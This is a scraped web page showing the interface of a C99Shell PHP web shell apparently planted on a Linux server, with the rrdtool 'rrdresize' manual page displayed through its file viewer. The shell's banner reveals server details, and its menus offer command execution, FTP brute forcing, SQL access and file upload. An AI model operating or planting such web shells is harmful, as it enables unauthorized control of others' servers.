!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/usr/share/doc/rrdtool/html/   drwxr-xr-x
Free 11.77 GB of 61.93 GB (19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rrdresize.html (1.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
rrdresize

NAME

rrdresize - alters the size of an RRA and creates a new .rrd file

SYNOPSIS

rrdtool resize filename rra-num GROW|SHRINK rows

DESCRIPTION

The resize function is used to modify the number of rows in an RRA.

filename

the name of the RRD you want to alter.

rra-num

the RRA you want to alter. You can find the number using rrdtool info.

GROW

used if you want to add extra rows to an RRA. The extra rows will be inserted as the rows that are oldest.

SHRINK

used if you want to remove rows from an RRA. The rows that will be removed are the oldest rows.

rows

the number of rows you want to add or remove.

NOTES

The new .rrd file, with the modified RRAs, is written to the file resize.rrd in the current directory. The original .rrd file is not modified.

It is possible to abuse this tool and get strange results by first removing some rows and then reinserting the same amount (effectively clearing them to be Unknown). You may thus end up with unknown data in one RRA while at the same timestamp this data is available in another RRA.

AUTHOR

Alex van den Bogaerdt <alex@vandenbogaerdt.nl>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5047 ]--